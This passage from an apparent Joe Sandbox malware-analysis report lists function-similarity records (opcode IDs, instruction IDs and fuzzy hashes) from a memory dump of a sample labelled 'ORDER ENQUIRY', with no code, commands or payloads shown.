                                                                                                                                                                          • Instruction Fuzzy Hash: 05422A75A002199FEB29CFA9C881BADBBF5FF48300F14C199E949EB242D7349985DF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
                                                                                                                                                                          • Instruction ID: a1f648c391972b698cd9eb9ad63a8909b60e136139187eb738c34091d1cd9c42
                                                                                                                                                                          • Opcode Fuzzy Hash: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
                                                                                                                                                                          • Instruction Fuzzy Hash: FA321270A007558FEB29CF69C8447BEBBF2FF84700F55419EE8469B289D7B5A801CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
                                                                                                                                                                          • Instruction ID: 7d1c06dffc3d01d318092a2d5351021022e4c462dee035a3dc9d7490caffaaa5
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6222B0702046518BEBA9CF39C091772BBF1EF45344F0886D9EE96AF286D375E452CB60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                          • Instruction ID: 11557015e8c2604c8554c806c84da42bcc2d1849ecd48ac6519a1f0f8def48a1
                                                                                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                          • Instruction Fuzzy Hash: 04F19F70E0060A9BDF19CFA9C580BAEBBF5FF48710F498169E942AB754E734D841CB60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
                                                                                                                                                                          • Instruction ID: eb0ec88331f2e33e0c5eed31533986e04096767d9d49fc660e6811260cfff4c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD1F071A0060A9FDF09CFA9C881AFEB7F1EF88304F18C1A9D955E7241E735E9059B60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
                                                                                                                                                                          • Instruction ID: 3e20e5671959919ec5eb80eeb46f91e709024585cf942bf8c0bb08cfb0a32252
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE16D71508382CFC715CF28C5D0AAABBE4FF89314F05896DE99987352EB31E945CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
                                                                                                                                                                          • Instruction ID: 7167a8176f0cfcca0a2e63c0427e765804ddfe719239bbb9d36daf00e0f09d1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
                                                                                                                                                                          • Instruction Fuzzy Hash: C8D10171A002069BDB19CF68C980EBABBB5FF54305F48426DF912DB2C1EB38E950CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                          • Instruction ID: 7b4e401705bb4c5dab21db36131815b0b4596489492c10b8344955b51db1e4ee
                                                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                          • Instruction Fuzzy Hash: 31B16374A006059FDF28DF99C980AABBBBAFFC4304F10459DBA5297790DB34E919CB11
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                          • Instruction ID: ad717ca8d09a25d59b66fb692a78fa4cd778030c44965ba92a8ea2734db7dd1e
                                                                                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB12535600646DFDB29DBA8C950BBEBBF6EF88700F194199E6429B385D730ED41CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
                                                                                                                                                                          • Instruction ID: cbb8e8543e58cf97fef9d1218aa772733e800db5f89f07cbcd7417a189730c70
                                                                                                                                                                          • Opcode Fuzzy Hash: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BC148751083818FE764DF29C484BABB7E9FF88304F45496DEA8987291D778E904CF92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
                                                                                                                                                                          • Instruction ID: b5468913fed293aac6728aebba6192a747ec38ba72ee9f57d02922613a2fa6ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB19670A002668BEB25DF68C990BA9B7F5EF44710F4485E9E54AE7285EB30DDC5CF20
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
                                                                                                                                                                          • Instruction ID: 52e2a8ca94682bf72f7d156f9fb43bcc6ee0a7ea9bbfd2321ea3d832a56a8a85
                                                                                                                                                                          • Opcode Fuzzy Hash: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 37A10731E00A199FEB26DB98C944BBEBBB4FF00714F060199EA12AB2D5D7749D44CBD1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
                                                                                                                                                                          • Instruction ID: 473bbe5ca56b8cce8e5cc5fee56230615d1f04f1c6f7ea8743f4c0b8d297e1b0
                                                                                                                                                                          • Opcode Fuzzy Hash: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AA1A170B006269BDB25DFA9C690BAAB7B2FF54314F14412DFB4997283DB34E805CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
                                                                                                                                                                          • Instruction ID: bed8a65f94985247f59e53c76c121fadb0a88feb35eda0f22b0eb4a42f6130ca
                                                                                                                                                                          • Opcode Fuzzy Hash: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA1DF72A14212DFC719EF18CA80B6ABBE9FF58B04F4505ADF5459B651D734EC00CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                          • Instruction ID: 158000ab35018f22ffe3d8e0337a6a991d96d355be90f518036d8c0f557be5b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                          • Instruction Fuzzy Hash: E5B14771E0061ADFDF29DFA9C980AADBBB5FF48710F1481A9E914A7390D730A941CF94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
                                                                                                                                                                          • Instruction ID: eb3138def3ee3b581c25cd72cd52f59e1981fdf0badf43fc6ee695cb88d88817
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
                                                                                                                                                                          • Instruction Fuzzy Hash: BE916371D00616BFDF19CF69D884BAEBBB5EF88710F154199E610EB241D734DA109BA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
                                                                                                                                                                          • Instruction ID: 67e9112828d309bd240a893f4eb946070e0e589ec7191df975b454a77c956967
                                                                                                                                                                          • Opcode Fuzzy Hash: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
                                                                                                                                                                          • Instruction Fuzzy Hash: DD913671A00656CBEB28DB6CC540BBABFB2EFA4B14F0940ADED059B285EB34D901C751
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
                                                                                                                                                                          • Instruction ID: 5f0ec4be00d843318c86c96b497800e5a78e59d50d6c6fe624dfc5f1580f42e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 8281B4B1E006169FDB29CF69C940ABEBBF9FB48700F04852EE545E7680E734D951CB94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                          • Instruction ID: e2ce7ed67deeb7760dd5aedff69827ec2ca5d48fdf509c13157ee9ac356c8c93
                                                                                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                          • Instruction Fuzzy Hash: A2815371A002099FDF5DCF69C890ABEBBB6FF84310F1885A9D9259B385DB74E901CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
                                                                                                                                                                          • Instruction ID: 598d518fdbeaaaab0c20b5a37a3711ad3326194c1a11ce2fade5abfbd8ac64a3
                                                                                                                                                                          • Opcode Fuzzy Hash: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
                                                                                                                                                                          • Instruction Fuzzy Hash: FA817E71A0061AAFDB25CFA9C984BEEBBF9FF48314F14442AE559A7250D730AC45CB60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
                                                                                                                                                                          • Instruction ID: 0293d68a7c4f59416f808b970e400929fab561e10792905bc556de1547d2e256
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D71D1B5D00629DBCB29CF59C9907BEBBB0FF48B10F99415EE856AB358D3349800CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
                                                                                                                                                                          • Instruction ID: 6963e833d24323bda1078df668cae617287dbc08e18f64827c20a622024be297
                                                                                                                                                                          • Opcode Fuzzy Hash: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
                                                                                                                                                                          • Instruction Fuzzy Hash: AC71B4B1900605EFDB28CFA9DA41A9EBBFCFFA4340F44419AE654A7298D735C940CF54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
                                                                                                                                                                          • Instruction ID: 0a95347e891eba167b8e8e652e102f86dc0b28827a9a66f3b7c680cb0530511b
                                                                                                                                                                          • Opcode Fuzzy Hash: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
                                                                                                                                                                          • Instruction Fuzzy Hash: E471D0356042428FD716DF2CC480B6AB7E5FF84710F0985AEE899CB352DB78D845CBA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                          • Instruction ID: a88496d2f4d3e0aab06816e22784e51410249c06749e97dcdfa377b109113857
                                                                                                                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                          • Instruction Fuzzy Hash: 32716D71A00609EFDF15EFA9C984AEEBBB8FF98700F104569E505E7290DB30EA15CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
                                                                                                                                                                          • Instruction ID: 827ed4185a2e17c93e18735b60f7a65e83fe576700a1ba6c85712492e20b45a4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B710232200701AFEB3ADF18C984F6ABBA6EF41720F14859CE655972A0D774E944EB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                                                                                                                                          • Instruction ID: 7de62a90b9d3692672525bedfc86c274af338ec474154a8b4ab62f214053da97
                                                                                                                                                                          • Opcode Fuzzy Hash: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C819072A04345CFDB28CF9CD584BEDB7B9EB48310FAA41ADD9046B286D7759D40CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                                                                                                                                          • Instruction ID: 870caada9641c07e4b088f45495280ecc677036086cb07ac5f3d15639f0c61b3
                                                                                                                                                                          • Opcode Fuzzy Hash: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                                                                                                                                          • Instruction Fuzzy Hash: 88710A71E0020AAFDF15DF94C981FEEBBB9FF04750F504269F621A6290D774AA05CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                                                                                                                                          • Instruction ID: 469fc695209ae467a5c52835a7c470c78ea8238d2bbf134fc5aea26f5fce78d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                                                                                                                                          • Instruction Fuzzy Hash: 0651CF72504712AFDB15DA78C894B5BBBECEBD8750F0009A9BA40EB150D778ED05C7A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                                                                                                                                          • Instruction ID: be8ef505c2c12eeb37cc065aa7997f0ef5136deb594a0d96ac7d8d27da2f3ec2
                                                                                                                                                                          • Opcode Fuzzy Hash: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E51DE709007059FDB69CF5AC880B6BFBF8FF54710F10465EEA52576A1C7B0A545CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                                                                                                                                          • Instruction ID: 4d03e22b1ec1f3ab02054ac1fffdde8276d0ee361b1ba0bd4d8465f8b6bd8368
                                                                                                                                                                          • Opcode Fuzzy Hash: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                                                                                                                                          • Instruction Fuzzy Hash: E6519E31200A15EFCB22EFAACA84EAAB7F9FF14744F40046EE50597261D734E944CB60
                                                                                                                                                                          Memory Dump Source
